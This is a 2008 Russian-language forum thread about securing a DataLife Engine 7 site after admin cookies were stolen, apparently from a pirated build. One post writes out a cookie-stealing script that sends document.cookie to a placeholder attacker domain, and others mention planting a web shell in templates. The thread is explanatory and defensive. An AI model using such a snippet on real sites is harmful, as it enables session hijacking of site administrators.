Помощь [help] Защитить DLE 7

Artem_007 · 17 Июн 2008

glam написал(а):
Элементарно украли куки, по твоей же беспечности, уязвимостей в DLE нет. Причина - человечкский фактор. Так что не разводи кипишь и следи за СВОЕЙ информационной безопасностью внимательнее.:tcl:

Ну я бы не говорил так уверенно, например в 6.7 есть уязвимость....

Может быть, все мождет быть

ИМХО шаблоны нужно заказывать у уже зарекомендовавших себя дизайнеров, а не там где дешевле...

botAniks · 17 Июн 2008

Vvaann, а ты пользуешься легальной ДЛЕ или нуленой? Не посылает ли твоя ЦМС-ка письма с паролями админки на чей-то адрес? Контролируй отправляемую почту. Есть ли у тебя файрвол, может твои кукисы периодически становятся добычей кулхацкеров? Да и в браузерах вообще нельзя админские пароли сохранять.

Vvaann · 17 Июн 2008

Увы, нуленкой

botAniks · 18 Июн 2008

Artem_007 написал(а):
Ну я бы не говорил так уверенно, например в 6.7 есть уязвимость....

Может быть, все мождет бытьИМХО шаблоны нужно заказывать у уже зарекомендовавших себя дизайнеров, а не там где дешевле...

Даже не представляю, как можно через шаблон DLE воровать админские пароли? :nezn:

Подскажите плиз, чтобы тоже не проворонить!

Prescott · 19 Июн 2008

Даже не представляю, как можно через шаблон DLE воровать админские пароли? Подскажите плиз, чтобы тоже не проворонить!

Элементарно, в любом месте шаблона прописывается

Код:

<script>
document.write('<img src="сайт_васи_пупкина_хакера.ru/?cookiesteeler"+document.cookie')
</script>

Или шелл в папке с шаблонами оставляет

botAniks · 20 Июн 2008

Prescott написал(а):
Элементарно, в любом месте шаблона прописывается

Код:

<script> document.write('<img src="сайт_васи_пупкина_хакера.ru/?cookiesteeler"+document.cookie') </script>

Или шелл в папке с шаблонами оставляет

Ну, это возможно, только если куками пользуешься, и сохраняешь пароли в браузерах, так?

Djuiser · 27 Июн 2008

Нет

Не совсем, в дле или других нормальных движках куки используется всегда, и это возможно даже без сохранения паролей. Оно ворует "теперешние" куки, ты зашол под своим ником на сайт, перешол на страницу с XSS и все, твои куки с этого сайта улетели... Но только кто и как сможет в шаб залить XSS или шелл?) Если могут это залить в шаблон, тогда никакие пароли не нужны )) Тебе уже весь сайт открыт :-]

, ну если зарание в шаблон закинули это, тогда уже лучше кидать шелл... Ну все возможно )

bobkli · 6 Авг 2008

Vvaann
Нулл откуда качал

Shotlandec · 6 Авг 2008

раз пошло такое обсуждение, то вы все знаете, что на нулледе переодически у вас появляется сообщение, что ваш пароль устарел, смените его.... так вот, если какая реализация какого-нить хака на dle, такого же плана?

Sonikflame · 6 Авг 2008

dos03 написал(а):
2. Изменить название файла admin.php на другое (не забыв прописать его в админке).

Сменой названия файла ничего не добьетесь,его можно легко узнать выбрав функцию исходного текста
var dle_admin = 'admin.php';

Помощь [help] Защитить DLE 7

Artem_007

Постоялец

botAniks

Постоялец

Vvaann

Создатель

botAniks

Постоялец

Prescott

Создатель

botAniks

Постоялец

Djuiser

Писатель

bobkli

Местный

Shotlandec

Постоялец

Sonikflame

Создатель